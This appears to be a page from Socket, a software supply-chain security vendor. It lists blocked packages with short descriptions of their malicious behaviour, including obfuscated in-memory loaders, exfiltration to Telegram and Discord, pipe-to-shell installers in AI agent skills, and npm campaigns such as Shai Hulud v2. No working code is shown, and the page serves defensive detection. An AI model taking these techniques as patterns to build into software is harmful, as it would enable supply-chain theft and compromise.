3.5.105

Live on pypi

Blocked by Socket

This file is a concentrated collection of active exploit/deserialization payloads designed to detect or trigger known gadget chains and vulnerabilities across multiple platforms. While formatted as a testing catalog, its content is inherently dangerous: it includes explicit command-execution payloads, remote class-loading references, and authentication-bypass tokens. If found in a codebase or dependency, treat as high-risk—remove from production, restrict access, audit any use or transmission logs, and verify no unauthorized target interactions occurred. Only use in controlled, authorized testing environments.

sphinx

1.4.2

Live on pypi

Blocked by Socket

This HTML file contains clear malicious content with repeated attempts to load unknown JavaScript from the local file system. The file:// protocol usage combined with the suspicious filename and excessive repetition indicates a high-risk security threat that could lead to local system compromise.

kejie.bos

2.0.10

by Kejiesoft

Live on nuget

Blocked by Socket

This file mixes legitimate helper types (JSON converters, cache managers, Redis, Wx settings, QR code utilities) with a large, highly obfuscated loader/unpacker that reads encrypted resources, performs decryption, manipulates process memory, P/Invokes native APIs (VirtualAlloc/mprotect/WriteProcessMemory/OpenProcess/etc.), dynamically generates delegates/methods, and executes code in memory. Those capabilities (resource decryption -> write into executable memory -> change protections -> invoke) are typical of packers, runtime unpackers, or implant loaders and are high-risk in a dependency. I consider this behavior malicious or at least extremely risky for supply-chain use: the module can execute code not visible in source, perform process memory operations, detect tampering, and load native/jitted payloads. Recommend removing or sandboxing and performing full binary/behavioral analysis before use.

354766/1nfsh-s1/skills/agent-browser/

20d09c09eb2aa281ee179f741d5e9ae585a27441

Live on socket

Blocked by Socket

[Skill Scanner] Pipe-to-shell or eval pattern detected

All findings:
[CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4]
[CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] (this finding is reported repeatedly throughout the skill)
[CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] (reported twice)

This skill is functionally coherent with its stated purpose (hosted browser automation via inference.sh) and contains expected high-risk capabilities for such a tool: arbitrary JavaScript execution, file uploads, proxy configuration, and routing through a hosted backend. There is no direct evidence in the provided document of hidden malicious code or obfuscation. However, the design requires high trust in the inference.sh distribution and backend because sensitive data (page DOM, cookies, uploaded local files, videos/screenshots, user credentials) will transit through that service. The most likely abuse scenarios are credential/data harvesting via a malicious proxy or compromise of the inference.sh backend or CLI binary. I rate this as suspicious/high-risk in a supply-chain sense (not evidently malicious in the file itself) and recommend careful review of the inference.sh binaries, hosting operator trust, and limiting use of proxy/execute/file-upload features when handling sensitive data.

LLM verification: The agent-browser skill's documented capabilities match legitimate Playwright-based browser automation tools, but multiple high-risk design and supply-chain elements are present: a pipe-to-shell installer pattern, reliance on external distribution domains, remote execution via inference.sh infrastructure, arbitrary JS execution in page context, local-file upload capability, and proxy credential handling. These create significant opportunities for sensitive-data exposure or misuse if the inferenc

cl-lite

1.0.1236

by michael_tian

Live on npm

Blocked by Socket

The source code contains embedded inappropriate adult content with numerous external image links. It is not valid or functional software code. No explicit malware or direct security vulnerabilities are detected, but the presence of inappropriate content and the corrupted format pose a significant security and content risk. This package should be rejected or quarantined due to its high risk and inappropriate content.

workspace-loader

1.0.0

by fakemgz

Live on npm

Blocked by Socket

The code is designed to collect and exfiltrate rich host information to a Telegram bot without user consent, using embedded credentials and silent operation. This constitutes data exfiltration with backdoor-like traits and represents a high security risk. Hardcoded credentials enable uncontrolled data leakage, and access to sensitive files (e.g., /etc/passwd) and environment variables worsens the risk. Remove hardcoded credentials, implement explicit user consent, limit data collection, and avoid automatic exfiltration from dependencies.

@energysolutions/mylib

99999999.999999.999999

by zoeovpz

Live on npm

Blocked by Socket

The code exhibits behaviors typical of malware, such as unauthorized data collection and transmission to an external server. The use of a Discord webhook for data exfiltration is particularly concerning. The provided reports are placeholders and do not offer any analysis, necessitating a reevaluation based on the code's behavior.

github.com/milvus-io/milvus

v0.10.3-0.20211206104757-51c0c0b87c6f

Live on go

Blocked by Socket

This code implements an insecure, unauthenticated RPC mechanism that allows remote clients to cause arbitrary code execution and exfiltrate files/system information. Using pickle over an untrusted network and invoking methods by client-supplied names are severe supply-chain/backdoor risks. Do not deploy or reuse this code in production; it should be treated as a backdoor/untrusted remote-execution component unless wrapped with strong authentication, authorization, sandboxing, and safe serialization.

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Possible typosquat attack

Known malware

Telemetry

Unstable ownership

Git dependency

GitHub dependency

AI-detected potential malware

HTTP dependency

Obfuscated code

Suspicious Stars on GitHub

54 more alerts

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.


Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.


Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.


Protect every package in your stack

Secure your team's dependencies across your stack with Socket. Stop supply chain attacks before they reach production.

RUST: crates.io, Rust Package Manager

PHP: Packagist, PHP Package Manager

GOLANG: Go Modules, Go Dependency Management

JAVA: Maven Central

JAVASCRIPT: npm, Node Package Manager

.NET: NuGet, .NET Package Manager

PYTHON: PyPI, Python Package Index

RUBY: RubyGems.org, Ruby Package Manager

SWIFT: Swift

AI: Hugging Face Hub, AI Model Hub

CI: GitHub Actions, CI/CD Workflows

EXTENSIONS: Chrome Web Store, Chrome Browser Extensions

EXTENSIONS: Open VSX, VS Code Extensions

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Nov 23, 2025

Shai Hulud v2

Shai Hulud v2 campaign: preinstall script (setup_bun.js) and loader (setup_bin.js) that installs/locates Bun and executes an obfuscated bundled malicious script (bun_environment.js) with suppressed output.

Nov 05, 2025

Elves on npm

A surge of auto-generated "elf-stats" npm packages is being published every two minutes from new accounts. These packages contain simple malware variants and are being rapidly removed by npm. At least 420 unique packages have been identified, often described as being generated every two minutes, with some mentioning a capture the flag challenge or test.

Jul 04, 2025

RubyGems Automation-Tool Infostealer

Since at least March 2023, a threat actor using multiple aliases uploaded 60 malicious gems to RubyGems that masquerade as automation tools (Instagram, TikTok, Twitter, Telegram, WordPress, and Naver). The gems display a Korean Glimmer-DSL-LibUI login window, then exfiltrate the entered username/password and the host's MAC address via HTTP POST to threat actor-controlled infrastructure.

Mar 13, 2025

North Korea's Contagious Interview Campaign

Since late 2024, we have tracked hundreds of malicious npm packages and supporting infrastructure tied to North Korea's Contagious Interview operation, with tens of thousands of downloads targeting developers and tech job seekers. The threat actors run a factory-style playbook: recruiter lures and fake coding tests, polished GitHub templates, and typosquatted or deceptive dependencies that install or import into real projects.

Jul 23, 2024

Network Reconnaissance Campaign

A malicious npm supply chain attack that leveraged 60 packages across three disposable npm accounts to fingerprint developer workstations and CI/CD servers during installation. Each package embedded a compact postinstall script that collected hostnames, internal and external IP addresses, DNS resolvers, usernames, home and working directories, and package metadata, then exfiltrated this data as a JSON blob to a hardcoded Discord webhook.

Ready to dive in?

Get protected by Socket with just 2 clicks.


The latest from the Socket team

Get our latest security research, open source insights, and product updates.
